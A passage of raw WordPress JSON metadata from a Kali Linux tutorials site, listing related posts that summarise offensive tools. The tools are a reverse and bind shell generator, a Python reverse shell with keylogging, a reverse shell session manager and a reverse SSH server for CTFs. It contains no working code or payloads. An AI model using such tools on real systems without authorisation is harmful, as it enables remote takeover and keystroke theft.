PHP : php-cli & php-curl for linux Also ReadHershell \u2013 Simple TCP Reverse Shell Which Can Work On Multiple Systems SVScanner Installation Linux git clone https:\/\/github.com\/radenvodka\/SVScanner.git\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/04\/button_download.png?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]},{"id":10558,"url":"https:\/\/kalilinuxtutorials.com\/shellerator\/","url_meta":{"origin":8640,"position":2},"title":"Shellerator : CLI Tool For The Generation Of Bind &#038; Reverse Shell","author":"R K","date":"May 13, 2020","format":false,"excerpt":"Shellerator is a simple command-line tool aimed to help pentesters quickly generate one-liner reverse\/bind shells in multiple languages (Bash, Powershell, Java, Python...). This project is inspired by Print-My-Shell. I just rewrote it and added some options and glitter to it. The lists of reverse and bind shells are not perfect\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":6551,"url":"https:\/\/kalilinuxtutorials.com\/tinkerershell-simple-python-reverse-shell\/","url_meta":{"origin":8640,"position":3},"title":"TinkererShell : A Simple Python Reverse Shell","author":"R K","date":"September 20, 2019","format":false,"excerpt":"TinkererShell is a simple python reverse shell written just for fun. Simple reverse shell written in python 3.7 just for fun. Actually it supports Windows and Linux OS and integrates some basic features like keylogging and AES encrypted communications. Supported operating systems: Windows Linux Functions and characteristics: Reverse connection. AES\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":4690,"url":"https:\/\/kalilinuxtutorials.com\/platypus-multiple-reverse-shell\/","url_meta":{"origin":8640,"position":4},"title":"Platypus :  A modern Multiple Reverse Shell Sessions Manager Written In Go","author":"R K","date":"April 21, 2019","format":false,"excerpt":"Platypus is a modern multiple reverse shell sessions\/clients manager via terminal written in go. It include the following Multiple service listening portMultiple client connectionsRESTful APIReverse shell as a service Also Read - W12Scan : A Simple Asset Discovery Engine for Cybersecurity Network Topology Attack IP: 192.168.1.2 Reverse Shell Service: 0.0.0.0:8080\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":17434,"url":"https:\/\/kalilinuxtutorials.com\/reversessh\/","url_meta":{"origin":8640,"position":5},"title":"ReverseSSH : Statically-linked Ssh Server With Reverse Shell Functionality For CTFs And Such","author":"R K","date":"August 26, 2021","format":false,"excerpt":"ReverseSSH is a statically-linked ssh server with a reverse connection feature for simple yet powerful remote access. Most useful during HackTheBox challenges, CTFs or similar. Has been developed and was extensively used during OSCP exam preparation. Features Catching a reverse shell with\u00a0netcat\u00a0is cool, sure, but who hasn't accidentally closed a\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"ReverseSSH : Statically-linked Ssh Server With Reverse Shell Functionality For CTFs And Such","src":"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-iDjAdd1KHe8\/YSSYKe43V5I\/AAAAAAAAKiY\/LPeSNS2AYQkc0BOL1u2OP5euIXpU6NNegCLcBGAsYHQ\/s569\/ReverseSSH-SSH-Server-with-Reverse-Shell-Functionality-370x247%2B%25281%2529.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-iDjAdd1KHe8\/YSSYKe43V5I\/AAAAAAAAKiY\/LPeSNS2AYQkc0BOL1u2OP5euIXpU6NNegCLcBGAsYHQ\/s569\/ReverseSSH-SSH-Server-with-Reverse-Shell-Functionality-370x247%2B%25281%2529.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/1.bp.blogspot.com\/-iDjAdd1KHe8\/YSSYKe43V5I\/AAAAAAAAKiY\/LPeSNS2AYQkc0BOL1u2OP5euIXpU6NNegCLcBGAsYHQ\/s569\/ReverseSSH-SSH-Server-with-Reverse-Shell-Functionality-370x247%2B%25281%2529.png?resize=525%2C300&ssl=1 1.5x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/8640","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=8640"}],"version-history":[{"count":0,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/8640\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/16067"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=8640"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=8640"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=8640"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}